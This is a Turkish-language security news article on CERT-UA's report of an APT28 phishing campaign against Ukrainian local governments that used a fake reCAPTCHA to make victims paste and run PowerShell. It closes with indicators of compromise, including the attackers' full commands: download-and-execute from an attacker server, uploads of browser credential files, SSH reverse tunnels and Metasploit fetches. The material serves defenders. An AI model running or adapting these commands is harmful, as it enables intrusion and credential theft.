ReCAPTCHA Rus Hackerlar Tarafından Ukrayna’yı Hedef Almak İçin Truva Atı Oluşturuldu


Ukrayna, Rus askeri istihbaratına (GRU) bağlı bilgisayar korsanlarının yerel yönetimleri hedef aldığı yeni bir siber saldırı vektörüyle karşı karşıya.

Ukrayna Bilgisayar Acil Durum Müdahale Ekibi (CERT-UA) kısa süre önce Rus GRU bağlantılı APT28 veya “Fancy Bear” tarafından gerçekleştirilen gelişmiş bir kimlik avı saldırısını ortaya çıkardı. Saldırganlar, yeni bir yaklaşım kullanarak, alıcıları kötü amaçlı PowerShell komutlarını doğrudan panolarından çalıştırmaya teşvik ediyor; bu, kötü amaçlı yazılımları minimum etkileşimle dağıtmak için yeni bir teknik.

Google’ın reCAPTCHA Benzeri

CERT-UA tarafından işaretlenen e-postalar, “Masa Değiştirme” konu başlığı altında yerel yönetim ofislerinde dolaşırken bulundu. Bu e-postalarda standart ekler yerine Google e-tablosunu taklit eden bir bağlantı bulunur.

Bağlantıya tıklamak, bir bot önleme ekranını taklit ederek şüpheleri ortadan kaldırmak için kullanılan bir taktik olan Google’ın reCAPTCHA taklidini başlatır. Ancak meşru reCAPTCHA istemlerinden farklı olarak bu tuzak, görünmeyen bir eylem gerçekleştirir: Kötü amaçlı bir PowerShell komutunu doğrudan kullanıcının panosuna kopyalar.

Bunu takiben talimatlar, kullanıcılardan komut istemini açan “Win+R” tuşuna basmasını, ardından yapıştırmak için “Ctrl+V” ve ardından çalıştırmak için “Enter” tuşuna basmasını ister. Yürütüldükten sonra yük başlatılarak sistemin tehlikeye girmesine neden olur.

reaCAPTCHA, Google Recaptcha, Ukrayna, CERT-UAreaCAPTCHA, Google Recaptcha, Ukrayna, CERT-UA
Truva Atı haline getirilmiş Google reCAPTCHA ve onun çalıştırdığı PowerShell komut dosyaları. (Kaynak: CERT-UA)

APT28’in taktikleri, bu grupların niyetlerini maskelemek için rutin görevlerde tanıdık eylemlerden nasıl yararlandıklarını gösteriyor. Bu teknik, temel sistem işlevlerinden yararlanır ve kullanıcıların bot doğrulama gibi görünüşte zararsız istemlere olan güvenini artırır.


Tarayıcınız video etiketini desteklemiyor.

CERT-UA analizi, komutun bir indirme ve yürütme dizisini başlattığını ortaya koyuyor. Kötü amaçlı bir HTML uygulaması olan “browser.hta”yı başlatıyor ve bu uygulama da Chrome, Edge, Opera ve Firefox gibi popüler tarayıcılardan veri çalmak üzere tasarlanmış bir PowerShell betiği olan “Browser.ps1″i çalıştırıyor.

Ek olarak, sızma için bir SSH tüneli kullanıyor ve çalınan kimlik bilgilerinin ve diğer hassas verilerin doğrudan saldırganlara aktarılmasına olanak tanıyor. En endişe verici yönlerden biri, betiğin, penetrasyon testlerinde yaygın olarak kullanılan ancak tehdit aktörleri arasında giderek daha popüler hale gelen bir araç olan Metasploit çerçevesini indirme ve çalıştırma yeteneğidir.

Süslü Ayı Genişleyen Cephaneliğiyle Süsleniyor

Bu, Ukraynalı kuruluşların APT28’in hedeflenen operasyonlarıyla ilk karşılaşması değil. CERT-UA, Eylül ayında grubun e-posta verilerini yeniden yönlendirmek için Roundcube e-posta güvenlik açığını (CVE-2023-43770) kullandığını bildirdi.

reaCAPTCHA, Google Recaptcha, Ukrayna, CERT-UA, RoundcubereaCAPTCHA, Google Recaptcha, Ukrayna, CERT-UA, Roundcube
Kötü amaçlı komut dosyaları, Roundcube güvenlik açığından yararlanıldıktan sonra çalıştırılır (Kaynak; CERT-UA)

Bu güvenlik açığından yararlanılması, saldırganların e-postaları saldırgan tarafından kontrol edilen bir adrese otomatik olarak ileten bir filtre yerleştirmesine olanak sağladı. Bu saldırı sırasında CERT-UA, güvenliği ihlal edilmiş en az on hükümet e-posta hesabının, Ukrayna savunma bağlantılarına daha fazla istismar göndermek için kullanıldığını tespit etti.

Her iki saldırıda da APT28, güvenliği ihlal edilmiş bir sunucu olan mail.zhblz’i kullandı.[.]com, kontrol için. Bu sunucuya bağlı IP (203.161.50[.]145) önceki kampanyalarda ortaya çıktı ve bu, APT28’in saldırılar boyunca sürekliliği korurken tespitten kaçınmak için gelişen operasyonel altyapısına işaret ediyor.

APT28’in devam eden faaliyetleri nedeniyle CERT-UA, devlet kurumlarının, hem kullanıcı güvenini hem de rutin görevleri istismar etmek için tasarlanmış, hedef odaklı kimlik avı kampanyalarına karşı dikkatli olmalarını tavsiye etti.

Ayrıca şunu okuyun: Rus Hacker Grubu APT28, Sahte Araba Reklamları Yoluyla Diplomatları Hedef Alacak HeadLace Kötü Amaçlı Yazılımını Başlattı

CERT-UA Tarafından Paylaşılan Uzlaşma Göstergeleri

Dosya Karmaları:

e9cb6270f09e3324e6620b8c909a83c6 d34ee70f162ce1dab6a80a6a3c8dabd8d2b1a77345be5b1d956c765752b11802 Browser.ps1  

d73124dbb5d8e5702df065a122878740 4e1bc758f08593a873e5e1d6f7d4eac05f690841abc90ddfa713c2bec4f9970f Browser.ps1  

597bd15ff25636d9cde61157c2a3c8a2 5200a4e1bb5174a3203ce603c34625493a5a88f0dfb98ed5856b18655fb7ba60 browser.hta  

446bab23379df08fecbab6fe9b00344e 3ec9a66609f1bea8f30845e5dbcf927cf0b3e92e40ef40272fdf6d784ba0d0af zapit.exe [METASPLOIT]

f389247be7524e2d4afc98f6811622fe e3a3abf8c80637445bab387be288b6475992b6b556cb55a5a8c366401fb864c5 rdp.exe  

981943d2e7ec0ab3834c639f49cc4b42 6bbf2b86e023f132416f40690b0386bd00e00cf3e1bef725dec92df7f1cd1007 id_rsa  

d26920b81f4e6b014a0d63169e68dfa7 edb81219b7728fa2ea1d97d5b3189f498ed09a72b800e115f12843f852b2a441 ssh.exe (legit)  

d1ccc802272a380b32338d17b2ac40a1 2446ab2e4dc85dc8b27141b2c1f777a01706f16d6608f4b5b0990f8b80dea9e0 libcrypto.dll (legit)

Ağ:

hXXps://docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com/document
(tcp)://mail.zhblz[.]com:8443
hXXps://mail.zhblz[.]com
hXXps://mail.zhblz[.]com/B
hXXps://mail.zhblz[.]com/b
hXXps://mail.zhblz[.]com/endpoint
hXXps://mail.zhblz[.]com/upload
hXXps://mail.zhblz[.]com/z
hXXps://mail.zhblz[.]com/id_rsa
hXXps://mail.zhblz[.]com/libcrypto
hXXps://mail.zhblz[.]com/ssh

(tcp)://203[.]161.50.145:22
(tcp)://203[.]161.50.145:6211
(tcp)://45[.]61.169.221:445

doc.gmail.com.gyehddhrggdii323sdhnshiswh2udhqjwdhhfjcjeuejcj.zhblz[.]com
docs.google.com.spreadsheets.d.1ip6eeakdebmwteh36vana4hu-glaeksstsht-boujdk.zhblz[.]com
mail.zhblz[.]com

203[.]161.50.145    
45[.]61.169.221     

Indicators from incident CERT-UA#10859 (unauthorized access to mailboxes)
103[.]50.33.50
103[.]50.33.54
109[.]236.63.165
185[.]197.248.94
194[.]35.121.200
194[.]35.121.202
194[.]35.121.50
195[.]64.155.64
198[.]54.117.242
203[.]161.50.145
37[.]19.218.144
37[.]19.218.146
37[.]19.218.156
37[.]19.218.157
37[.]19.218.160
37[.]19.218.168
37[.]19.218.174
37[.]19.218.183
45[.]155.43.118
45[.]155.43.121
45[.]94.211.159
45[.]94.211.161
45[.]94.211.164
80[.]77.25.206
95[.]214.216.76
95[.]214.216.78
95[.]214.217.94

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0
exchangelib/5.4.2 (python-requests/2.32.3)

Sunucular:

%APPDATA%\id_rsa
%APPDATA%\zapit.exe
%APPDATA%\ssh.exe
%APPDATA%\libcrypto.dll

C:\Users\Malgus\source\repos\rdp\rdp\obj\Debug\rdp.pdb

mshta https://mail.zhblz.com/b
ssh [email protected] -N -i %APPDATA%\id_rsa -R 0 -o StrictHostKeyChecking=no -o "PermitLocalCommand=yes" -o "LocalCommand=ssh -i \\45.61.169.221\key.pem [email protected] .1.1"
%APPDATA%\ssh.exe [email protected] -N -i %APPDATA%\id_rsa -R 0 -o StrictHostKeyChecking=no

powershell -WindowStyle Hidden -nop -exec bypass -c "iex (New-Object Net.WebClient).DownloadString('https://mail.zhblz.com/B');pumpndump -hq https://mail.zhblz. com;mshta https://mail.zhblz.com/b # ✅ ''I am not a robot - reCAPTCHA ID: {verification_id}''"
powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-RestMethod -Uri https://mail.zhblz.com/upload -Method Post -Body (@{filename="logins.json";file=" "}|ConvertTo-Json) -ContentType 'application/json'"
powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-RestMethod -Uri https://mail.zhblz.com/upload -Method Post -Body (@{filename="key4.db";file=" "}|ConvertTo-Json) -ContentType 'application/json'"
powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest -Uri https://mail.zhblz.com/libcrypto -OutFile %APPDATA%\libcrypto.dll"
powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest -Uri https://mail.zhblz.com/ssh -OutFile %APPDATA%\ssh.exe"
powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest -Uri https://mail.zhblz.com/z -OutFile %APPDATA%\zapit.exe"
powershell -WindowStyle Hidden -nop -exec bypass -c "Invoke-WebRequest https://mail.zhblz.com/id_rsa -OutFile $env:APPDATA\id_rsa"



Source link